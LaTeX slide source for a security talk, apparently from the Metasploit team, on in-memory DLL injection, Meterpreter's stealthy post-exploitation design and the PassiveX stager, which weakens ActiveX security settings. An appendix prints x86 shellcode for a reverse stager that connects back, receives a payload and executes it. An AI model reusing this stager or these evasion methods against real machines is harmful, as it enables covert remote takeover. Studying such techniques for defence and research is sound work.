\item Library loading on Windows is provided through \texttt{NTDLL.DLL}
|
||
|
\item \texttt{NTDLL.DLL} only supports loading libraries from disk
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\begin{sitemize}
|
||
|
\item To load libraries from memory, \texttt{NTDLL.DLL} must be tricked
|
||
|
|
||
|
\pause
|
||
|
\item When loading libraries, low-level system calls are used to interact with the file on disk
|
||
|
\begin{sitemize}
|
||
|
\item \texttt{NtOpenFile}
|
||
|
\item \texttt{NtCreateSection}
|
||
|
\item \texttt{NtMapViewOfSection}
|
||
|
\end{sitemize}
|
||
|
\item These routines can be hooked to change their behavior to operate against a memory region
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\begin{sitemize}
|
||
|
\item Once hooked, calling \texttt{LoadLibraryA} with a unique pseudo file name is all that's needed
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{In-Memory library injection on Windows}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item But why not just write a stub loader instead of using
|
||
|
\texttt{NTDLL.DLL}?
|
||
|
\end{sitemize}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item Lots of reasons...
|
||
|
\begin{sitemize}
|
||
|
\item Requires manual import processing
|
||
|
\item Requires manual relocation fix-ups
|
||
|
\item Requires loading dependent DLLs
|
||
|
\item May require manual insertion into the loaded module
|
||
|
lists
|
||
|
\item Other uncommon PE features that wouldn't
|
||
|
be supported
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item No compelling reason to re-implement what is already
|
||
|
supplied in \texttt{NTDLL.DLL}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
%
|
||
|
% We've demo'd this before, so even though it would be a great demo, at
|
||
|
% a perfect place in the talk, I don't think we should demo it
|
||
|
%
|
||
|
|
||
|
\subsection{Example DLL: VNC}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Library injection in action: VNC}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item VNC is a remote desktop protocol
|
||
|
\item Very useful for remote administration beyond simple CLIs
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\begin{sitemize}
|
||
|
\item First demonstrated at BlackHat USA 2004
|
||
|
|
||
|
\pause
|
||
|
\item Metasploit team converted RealVNC to a standalone DLL
|
||
|
\begin{sitemize}
|
||
|
\item No non-standard file dependencies
|
||
|
\item No installation required
|
||
|
\item Does not make any registry or filesystem changes
|
||
|
\item Does not listen on a port; uses payload connection as a VNC client
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item By using the generic library loading stager, VNC was simply plugged in
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\begin{sitemize}
|
||
|
\item Extremely useful when illustrating security weaknesses
|
||
|
\item Suits understand mouse movement much better than command lines
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
% more slides here, talking about post-exploitation technology
|
||
|
% why it's necessary
|
||
|
% - automation
|
||
|
% - evasion
|
||
|
% - extensibility
|
||
|
% what advantages it offers
|
||
|
% - pivoting
|
||
|
% - etc
|
||
|
% other stuff I can't think of right now
|
||
|
|
||
|
%
|
||
|
% Technology - TLV / Protocol
|
||
|
%
|
||
|
|
||
|
%
|
||
|
% We should also probably talk about it's asynchness and how that
|
||
|
% works great for sharing and threading!
|
||
|
%
|
||
|
\section{Meterpreter}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Meterpreter: Design goals}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Primary design goals are to be...
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item \textbf{Stealthy}: no disk access and no new process by default
|
||
|
\pause
|
||
|
\item \textbf{Powerful}: channelized communication and robust protocol
|
||
|
\pause
|
||
|
\item \textbf{Extensible}: run-time augmentation of features with extensions
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Portability also a design consideration
|
||
|
\begin{sitemize}
|
||
|
\item The current server implementation is only for
|
||
|
Windows
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Architecture}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Architecture - design goals}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Very flexible protocol; should adapt to extension
|
||
|
requirements without modification
|
||
|
|
||
|
\pause
|
||
|
\item Should expose a channelized communication system for
|
||
|
extensions
|
||
|
|
||
|
\pause
|
||
|
\item Should be as stealthy as possible
|
||
|
|
||
|
\pause
|
||
|
\item Should be portable to various platforms
|
||
|
|
||
|
\pause
|
||
|
\item Clients on one platform should work with servers on
|
||
|
another
|
||
|
|
||
|
\pause
|
||
|
\item All non-critical features should be implemented by
|
||
|
extensions
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Architecture - protocol}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Uses TLV (\texttt{Type-Length-Value}) to support
|
||
|
opaque data
|
||
|
|
||
|
\pause
|
||
|
\item Every packet is composed of zero or more TLVs
|
||
|
|
||
|
\pause
|
||
|
\item Packets themselves are TLVs
|
||
|
\begin{sitemize}
|
||
|
\item Type is the packet type (request, response)
|
||
|
\item Length is the length of the packet
|
||
|
\item Value is zero or more embedded TLVs
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item TLVs make packet parsing simplistic and flexible
|
||
|
\begin{sitemize}
|
||
|
\item No formatting knowledge is required to parse the
|
||
|
packet outside of the TLV structure
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
%
|
||
|
% Technology - Clients / Ruby APIs
|
||
|
%
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Core client/server interface}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Server written in C, client written in any language
|
||
|
|
||
|
\pause
|
||
|
\item Provides a minimal interface to support the loading of extensions
|
||
|
|
||
|
\pause
|
||
|
\item Implements basic packet transmission and dispatching
|
||
|
\item Exposes channel allocation and management to
|
||
|
extensions
|
||
|
|
||
|
\pause
|
||
|
\item Also includes support for migrating the server to
|
||
|
another running process
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\begin{sitemize}
|
||
|
\item Metasploit 2.x has a perl Meterpreter client
|
||
|
\item Metasploit 3.x will use a ruby Meterpreter client
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Augmenting features at run-time}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Adding new features is as simple as loading a DLL on
|
||
|
the server
|
||
|
\begin{sitemize}
|
||
|
\item Client uploads the extension DLL
|
||
|
\item Server loads the DLL from memory and
|
||
|
initializes it
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Client can begin sending commands for the new
|
||
|
extension
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Example Extension: Stdapi}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Meterpreter extensions in action: Stdapi}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Included in Metasploit 3.0
|
||
|
\item Combination of previous extensions into standard
|
||
|
interface
|
||
|
|
||
|
\pause
|
||
|
\item Provides access to standard OS features
|
||
|
|
||
|
\pause
|
||
|
\item Feature set provides for robust client-side automation
|
||
|
|
||
|
\pause
|
||
|
\item Designed to mirror the Ruby API to make it easy to use
|
||
|
existing scripts against targets
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
%
|
||
|
% Features - Meterpreter
|
||
|
%
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Why is Meterpreter useful?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Standard interface makes it possible to use one client
|
||
|
to perform common actions on various platforms
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item Execute a command interpreter and channelize the
|
||
|
output
|
||
|
|
||
|
\pause
|
||
|
\item Turn on the target's USB webcam and begin
|
||
|
streaming video
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Programmatically automatable
|
||
|
\begin{sitemize}
|
||
|
\item RPC-like protocol allows arbitrarily complex tasks
|
||
|
to be performed with a common interface
|
||
|
\item Extension-based architecture makes Meterpreter
|
||
|
completely flexible
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Use of in-memory library injection makes it possible
|
||
|
to run in a stealth fashion
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Some of the features Meterpreter can offer}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Command execution \& manipulation
|
||
|
\item Registry interaction
|
||
|
\item File system interaction
|
||
|
\item Network pivoting \& port forwarding
|
||
|
\item Complete native API proxying
|
||
|
\item Anything you can do as a native DLL, Meterpreter can
|
||
|
do!
|
||
|
\item Sky's the limit!
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
%
|
||
|
% But enough talk, let's get to the demos!
|
||
|
%
|
||
|
|
||
|
\pdfpart{Demos}
|
||
|
|
||
|
%
|
||
|
% Now talk about all the crazy cool features and demo shit here!
|
||
|
%
|
||
|
% - port forwarding
|
||
|
% - migrating
|
||
|
% - file access
|
||
|
% - clear event log or something silly
|
||
|
% - opengl demo (in memory .exe loading)
|
||
|
% - etc etc!
|
||
|
%
|
||
|
|
||
|
\pdfpart{Conclusion}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{What does the future hold?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Exploitation vectors and techniques are mature
|
||
|
|
||
|
\pause
|
||
|
\item Public post-exploitation suites still very weak
|
||
|
|
||
|
\pause
|
||
|
\item However, post-exploitation is maturing
|
||
|
|
||
|
\pause
|
||
|
\item Metasploit 3.0 should be cool
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Reference Material}
|
||
|
|
||
|
\textbf{Payload Stagers}
|
||
|
\begin{sitemize}
|
||
|
% \item Windows Ordinal Stagers \\
|
||
|
% \footnotesize{\url{http://www.metasploit.com/users/spoonm/ordinals.txt}}
|
||
|
\item PassiveX \\
|
||
|
\footnotesize{\url{http://www.uninformed.org/?v=1&a=3&t=sumry}}
|
||
|
\end{sitemize}
|
||
|
\textbf{Payload Stages}
|
||
|
\begin{sitemize}
|
||
|
\item Library Injection \\
|
||
|
\footnotesize{\url{http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf}}
|
||
|
\item Meterpreter \\
|
||
|
\footnotesize{\url{http://www.nologin.org/Downloads/Papers/meterpreter.pdf}}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\appendix
|
||
|
|
||
|
\pdfpart{Appendix: Payload Stagers}
|
||
|
\section{Windows Ordinal Stagers}
|
||
|
\subsection{Reverse Ordinal Stager Implementation}
|
||
|
\begin{frame}[fragile]
|
||
|
\frametitle{Locating WS2\_32.DLL's base address}
|
||
|
|
||
|
\footnotesize{
|
||
|
\begin{verbatim}
|
||
|
FC cld ; clear direction (lodsd)
|
||
|
31DB xor ebx,ebx ; zero ebx
|
||
|
648B4330 mov eax,[fs:ebx+0x30] ; eax = PEB
|
||
|
8B400C mov eax,[eax+0xc] ; eax = PEB->Ldr
|
||
|
8B501C mov edx,[eax+0x1c] ; edx = Ldr->InitList.Flink
|
||
|
8B12 mov edx,[edx] ; edx = LdrModule->Flink
|
||
|
8B7220 mov esi,[edx+0x20] ; esi = LdrModule->DllName
|
||
|
AD lodsd ; eax = [esi] ; esi += 4
|
||
|
AD lodsd ; eax = [esi] ; esi += 4
|
||
|
4E dec esi ; esi--
|
||
|
0306 add eax,[esi] ; eax = eax + [esi]
|
||
|
; (4byte unicode->ANSI)
|
||
|
3D32335F32 cmp eax,0x325f3332 ; eax == 2_32?
|
||
|
75EF jnz 0xd ; not equal, continue loop
|
||
|
|
||
|
\end{verbatim}
|
||
|
}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[fragile]
|
||
|
\frametitle{Resolve symbols using static ordinals}
|
||
|
|
||
|
\footnotesize{
|
||
|
\begin{verbatim}
|
||
|
8B6A08 mov ebp,[edx+0x8] ; ebp = LdrModule->BaseAddr
|
||
|
8B453C mov eax,[ebp+0x3c] ; eax = DosHdr->e_lfanew
|
||
|
8B4C0578 mov ecx,[ebp+eax+0x78]; ecx = Export Directory
|
||
|
8B4C0D1C mov ecx,[ebp+ecx+0x1c]; ecx = Address Table Rva
|
||
|
01E9 add ecx,ebp ; ecx += ws2base
|
||
|
8B4158 mov eax,[ecx+0x58] ; eax = socket rva
|
||
|
01E8 add eax,ebp ; eax += ws2base
|
||
|
8B713C mov esi,[ecx+0x3c] ; esi = recv rva
|
||
|
01EE add esi,ebp ; esi += ws2base
|
||
|
03690C add ebp,[ecx+0xc] ; ebp += connect rva
|
||
|
\end{verbatim}
|
||
|
}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[fragile]
|
||
|
\frametitle{Create the socket, connect back, recv, and jump}
|
||
|
|
||
|
\footnotesize{
|
||
|
\begin{verbatim}
|
||
|
; Use chained call-stacks to save space
|
||
|
; connect returns to recv returns to buffer (fd in edi)
|
||
|
53 push ebx ; push 0
|
||
|
6A01 push byte +0x1 ; push SOCK_STREAM
|
||
|
6A02 push byte +0x2 ; push AF_INET
|
||
|
FFD0 call eax ; call socket
|
||
|
97 xchg eax,edi ; edi = fd
|
||
|
687F000001 push dword 0x100007f ; push sockaddr_in
|
||
|
68020010E1 push dword 0xe1100002
|
||
|
89E1 mov ecx,esp ; ecx = &sockaddr_in
|
||
|
53 push ebx ; push flags (0)
|
||
|
B70C mov bh,0xc ; ebx = 0x0c00
|
||
|
53 push ebx ; push length (0xc00)
|
||
|
51 push ecx ; push buffer
|
||
|
57 push edi ; push fd
|
||
|
51 push ecx ; push buffer
|
||
|
6A10 push byte +0x10 ; push addrlen (16)
|
||
|
51 push ecx ; push &sockaddr_in
|
||
|
57 push edi ; push fd
|
||
|
56 push esi ; push recv
|
||
|
FFE5 jmp ebp ; call connect
|
||
|
\end{verbatim}
|
||
|
}
|
||
|
\end{frame}
|
||
|
|
||
|
\end{document}
|
||
|
|
||
|
|
||
|
\begin{comment}
|
||
|
|
||
|
|
||
|
NOTEZ
|
||
|
|
||
|
First
|
||
|
|
||
|
What aren't we talking about
|
||
|
- New exploit vectors
|
||
|
- New exploit techniques
|
||
|
- Bugs in any shape, size, or form
|
||
|
|
||
|
What is encoding, and why do we do it?
|
||
|
- Bad character avoidence, don't need special case payloads for that..
|
||
|
- Added bonus of evasion
|
||
|
- Nice because you usually just need to write 1 good encoder...
|
||
|
|
||
|
What is staging, and why?
|
||
|
- Size problem
|
||
|
- Multiple your aresenal, 5 stagers + 5 stages, 10 shellcodes, but 25 payloads
|
||
|
|
||
|
Should move around the ordinal information, explain what ordinals are first.
|
||
|
Talk about how ordinals are diffined to be static in their .lib
|
||
|
List some of the limitations for ws2_32 (like no WSASocket, and what that means
|
||
|
in terms of writing shellcode, pipe shell, etc).
|
||
|
|
||
|
|
||
|
Post exploitation.
|
||
|
|
||
|
What's most important to them
|
||
|
1) Features
|
||
|
2) Evasion
|
||
|
3) Technology.
|
||
|
|
||
|
The order we should present is reverse, save the best for last
|
||
|
|
||
|
1) introduce and explain the technology
|
||
|
- dll injection
|
||
|
- TLV protocol, async, threadsafe, meterp sharing, etc
|
||
|
- Ruby APIs (how they emulate the native APIs, native API replacement, etc)
|
||
|
|
||
|
2) explain how this has the added benefit against anti-forensics
|
||
|
- no disk access
|
||
|
- anti-debugging
|
||
|
- page locking / swapping prevention
|
||
|
- encryption
|
||
|
- connection reuse and tunneling / channels
|
||
|
- no filesystem .exe loading...
|
||
|
|
||
|
3) explain the type of features an end-pentester would see
|
||
|
- pivoting / portfwd
|
||
|
- file upload / download, list, run, etc
|
||
|
- channels, multiple command shells, hung terminal doesn't totally fuck you
|
||
|
- vnc / idle time stffu (ties into stealthyness)
|
||
|
|
||
|
Possible flashy demos:
|
||
|
- migrating
|
||
|
- Possibly change window colors, move windows, etc in the process we migrate
|
||
|
to. Was shok's idea, so you could "visualize" the migrate, etc.
|
||
|
- Do some flashy no-disk .exe injection, send up an opengl demo!
|
||
|
|
||
|
Interesting asides:
|
||
|
- Great for testing (Metatest, bringing you a better Metasploit Framework!)
|
||
|
- make a insanely great remote control application (automation)
|
||
|
|
||
|
|
||
|
Future stuff:
|
||
|
- Botnetesk type stuff / mesh
|
||
|
- Listening meterp / multiple control channels / better collaboration..
|
||
|
|
||
|
|
||
|
|
||
|
OLD ----
|
||
|
|
||
|
|
||
|
Notes on post-exploitation
|
||
|
|
||
|
- Core Impact / Syscall Proxying
|
||
|
|
||
|
+ Mainly written to support their feature set, not to expose it to an end
|
||
|
user. Don't think you're going to get much access to the syscall libraries,
|
||
|
they are all written in C and dlls for the most part it seems.
|
||
|
|
||
|
+ you get their nice features, pivoting, file access, minishell, etc, but
|
||
|
for anything beyond that, you have to upgrade your agent, and then I don't
|
||
|
believe those are using syscall proxying type things anymore. I think some
|
||
|
of them bundle python interpreters...
|
||
|
|
||
|
+ how it works
|
||
|
+ really cool, and simple
|
||
|
+ no need to write vicitim-side code for any calls you want to make
|
||
|
+ inefficent for some types of things (port scanning)
|
||
|
|
||
|
- CANVAS
|
||
|
|
||
|
- mosdef
|
||
|
- model is very similar to dN
|
||
|
- you have to write a client and server component
|
||
|
- build environment not seperated, have you write your client side component
|
||
|
in wanna-be-aitel c, and have you have it in a python script.
|
||
|
- he has an API to do some stuff, but mostly low level stuff, and nothing
|
||
|
high level and cool.
|
||
|
- like all of his stuff, it's very rough and primitive seeming. I'm sure,
|
||
|
just like spike, you can do some cool stuff with it, but it's like building
|
||
|
a car with a rock, or something...
|
||
|
|
||
|
+ Code is dirty....
|
||
|
+
|
||
|
|
||
|
\section{PassiveX}
|
||
|
\subsection{Overview}
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{PassiveX}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Robust payload stager capable of bypassing restrictive
|
||
|
outbound filters
|
||
|
\item Compatible with Windows 2000+ running Internet
|
||
|
Explorer 6.0+
|
||
|
\item Uses HTTP to communicate with attacker
|
||
|
\item Provides an alternate vector for library injection via
|
||
|
ActiveX
|
||
|
\item Detailed write-up can be found in reference materials
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{How PassiveX works}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Enables support for both signed and unsigned ActiveX
|
||
|
controls in the \texttt{Internet} zone.
|
||
|
\begin{sitemize}
|
||
|
\pause
|
||
|
\item Necessary because administrators may have disabled
|
||
|
ActiveX support for security reasons
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Launches a hidden instance of Internet Explorer
|
||
|
|
||
|
\pause
|
||
|
\item Internet Explorer loads a page that the attacker
|
||
|
has put an embedded ActiveX control on
|
||
|
|
||
|
\pause
|
||
|
\item Internet Explorer loads and executes the ActiveX
|
||
|
control
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Why is PassiveX useful?}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Relatively small (roughly 400 byte) stager that does not
|
||
|
directly interact with the network
|
||
|
|
||
|
\pause
|
||
|
\item Bypasses common outbound filters by tunneling through
|
||
|
HTTP
|
||
|
|
||
|
\pause
|
||
|
\item Automatically uses proxy settings defined in Internet
|
||
|
Explorer
|
||
|
|
||
|
\pause
|
||
|
\item Bypasses trusted application restrictions (ZoneAlarm)
|
||
|
|
||
|
\pause
|
||
|
\item ActiveX technology allows the attacker to implement
|
||
|
complex code in higher level languages (C, C++, VB)
|
||
|
\begin{sitemize}
|
||
|
\item Eliminates the need to perform complicated tasks
|
||
|
from assembly
|
||
|
\item ActiveX controls are functionally equivalent to
|
||
|
executables
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Implementation}
|
||
|
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Implementing the PassiveX stager}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item Enable download and execution of ActiveX controls
|
||
|
\begin{sitemize}
|
||
|
\item Open the current user's \texttt{Internet} zone
|
||
|
registry key
|
||
|
\item Enable four settings
|
||
|
\begin{sitemize}
|
||
|
\item \texttt{Download signed ActiveX controls}
|
||
|
\item \texttt{Download unsigned ActiveX controls}
|
||
|
\item \texttt{Run ActiveX controls and plugins}
|
||
|
\item \texttt{Initialize and script ActiveX controls not
|
||
|
marked as safe}
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Launch a hidden instance of Internet Explorer pointed
|
||
|
at a URL the attacker controls
|
||
|
|
||
|
\pause
|
||
|
\item Internet Explorer then loads and executes the attacker's
|
||
|
ActiveX control
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Example ActiveX: HTTP Tunneling Control}
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{An example ActiveX control}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item ActiveX controls may choose to build an HTTP tunnel
|
||
|
to the attacker
|
||
|
\item HTTP tunnels provide a streaming connection over HTTP
|
||
|
requests and responses
|
||
|
\item Useful for tunneling other protocols, like TCP,
|
||
|
through HTTP
|
||
|
|
||
|
% TODO: elaborate?
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\subsection{Pros \& Cons}
|
||
|
\begin{frame}[t]
|
||
|
\frametitle{Pros \& cons}
|
||
|
|
||
|
\begin{sitemize}
|
||
|
\item \textbf{Pros}
|
||
|
\begin{sitemize}
|
||
|
\item Bypasses restrictive outbound filters at both a
|
||
|
network and application level
|
||
|
|
||
|
\pause
|
||
|
\item Provides a method for using complex code written
|
||
|
in a high-level language
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item \textbf{Cons}
|
||
|
\begin{sitemize}
|
||
|
\item Does not work when run as a non-privileged user
|
||
|
\begin{sitemize}
|
||
|
\item Internet Explorer refuses to download ActiveX
|
||
|
controls
|
||
|
\end{sitemize}
|
||
|
|
||
|
\pause
|
||
|
\item Requires the ActiveX control to restore
|
||
|
\texttt{Internet} zone settings
|
||
|
\begin{sitemize}
|
||
|
\item May leave the machine vulnerable to compromise
|
||
|
if not done
|
||
|
\end{sitemize}
|
||
|
\end{sitemize}
|
||
|
|
||
|
\end{sitemize}
|
||
|
\end{frame}
|
||
|
|
||
|
\end{comment}
|